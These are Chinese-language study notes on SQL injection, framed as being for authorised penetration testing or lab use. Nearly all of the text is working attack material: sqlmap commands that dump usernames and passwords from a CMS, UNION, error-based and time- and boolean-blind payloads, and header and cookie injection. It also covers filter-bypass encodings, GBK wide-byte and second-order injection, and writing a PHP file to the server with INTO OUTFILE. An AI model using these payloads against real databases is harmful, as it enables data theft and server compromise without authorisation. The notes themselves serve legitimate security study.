SQL注入 (学习笔记; 以下手法仅可用于已获授权的渗透测试或本地靶场)
sql注入验证 (先探测注入点: `\` 和 `'` 用于破坏引号闭合以触发报错, `and 1=1` / `and 1=2` 对比两次响应差异判断条件是否被带入 SQL 执行):
\
'
and 1=1
and 1=2
sqlmap基本命令 (--dbs 列出数据库, -D/-T/-C 指定库/表/列, --dump 导出数据, --batch 非交互、全部采用默认选项)
sqlmap -r request.txt -p id    # -r 读取单个保存下来的 HTTP 请求文件(不支持 *.txt 通配), -p 限定只测试 id 参数
sqlmap -u '192.168.1.101/cms/show.php?id=38' --dbs
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms --tables
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users --columns
sqlmap -u '192.168.1.101/cms/show.php?id=38' -D cms -T cms_users -C username,password --dump --batch
注入
order by 判断字段数 (order by N 开始报错时, 字段数为 N-1)
union select 联合查询获取表名、字段名、字段值 (注意: MySQL 中 `--` 注释后必须紧跟空格才生效, 放在 URL 里要写成 `--+` 或 `--%20`, 或改用 `%23` 即 `#`; 否则 `--'` 不会被当作注释)
?id=1' order by 3 --
?id=0' union select 1,2,3 --
获取表名
0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --
获取字段名 (若单引号被过滤, 可用十六进制 0x7573657273 代替 'users')
0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --
获取字段值
0' union select 1,group_concat(username,0x3a,password),3 from users --+
盲注分类:
时间盲注:
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) --+
当数据库名第一个字符的 ascii 码是 115 (即 's') 时执行 sleep(3), 通过响应延迟判断; 否则返回 1 无延迟. 注意 ascii() 的括号必须在 =115 之前闭合, 且 `'1'` 后需用 and 连接条件
布尔盲注 (条件为真/假时页面内容不同, 无报错回显; 先判断长度, 再用 substr()/ascii() 逐位比较):
?id=1' and length(database())=8 --
文件读取和写入 (load_file()/into outfile 需要数据库账号具有 FILE 权限, 且受 secure_file_priv 限制: 为 NULL 时完全禁用, 非空时只能读写该目录; 写文件需要 web 目录的绝对路径并且目标文件不能已存在)
select load_file('path')
union select 1,'<?php phpinfo();?>',3 into outfile 'path' --
报错注入 (floor(rand(0)*2) 配合 group by 时, 因分组键重复触发 "Duplicate entry ... for key" 报错, 把 concat 的数据带进报错信息; 要求 from 的表至少有 3 行, information_schema.tables 总能满足)
rand() 随机函数
floor() 取整函数
count() 计数函数
group by clause 分组函数
获取数据库
0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
获取表名
0' union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
获取用户信息
0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --
双引号获取数据库 (注入点为双引号闭合时的写法; 这里用的是无种子的 rand(), 结果不确定, 可能需要多次请求才报错, 用 rand(0) 则每次结果一致)
0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --
注入绕过
大小写、双写、编码、内联注释
POST盲注
admin' and (select (if(length(database())>5,sleep(5),null))) --
admin' and (length(database())>5) --
User-Agent注入:
user-agent处注入
Referer注入:
referer处注入
payload:
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1'='1
' or '1'='1
' or (length(database())) >8 or if(1=1, sleep(5), null) or '1' = '1
sqlmap -r 读取请求文件时, 可在文件中用 * 标记注入位置(如 User-Agent、Referer 的值), sqlmap 只对标记处进行测试
update语句 (示例为易受注入的更新语句, 注入点在 set 的值中; 用 # 注释掉后面的 where, GET 中 # 需写成 %23)
update table_name set password='test' where id=1
passwd=123'or updatexml(1,concat(0x7e,database(),0x7e),1) #
cookie注入
cookiebase64注入
base64编码
== 为 base64 的填充字符(padding), 并非结束符; 整段 payload 需先 base64 编码再放入 cookie, 服务端解码后拼入 SQL
urlencode
%0a 换行
%0c 换页(FF)
%0d 回车(CR)
%09 tab键
%20 空格
&& 代替 and (GET 参数中 & 是参数分隔符, 需编码为 %26%26)
|| 代替 or (需编码为 %7c%7c)
GBK宽字节注入 (后端用 addslashes 等把 ' 转义为 \' 且连接字符集为 GBK 时, %df 与转义产生的 %5c 被当作一个 GBK 双字节字符, 反斜杠被"吃掉", 单引号重新生效)
-1%df' union select 1,2,3 --
%81 (同样可作为 GBK 首字节; 0x81-0xFE 范围内的字节如 %81、%bf、%df 均可尝试)
二次注入 (注册时恶意用户名被转义后安全入库, 之后其它功能把库中取出的用户名直接拼接进 SQL 时触发)
用户名为admin' -- -
updatexml()与extractvalue() (0x7e 即 ~ 使 XPath 表达式非法从而报错回显; 每次报错只能显示约 32 个字符, 长数据需配合 substr()/mid() 分段读取)
select * from table_name where id=1 and updatexml(-1,concat(0x7e,database(),0x7e),1)
select * from user where id=1 and extractvalue(-1,concat(0x7e,version(),0x7e))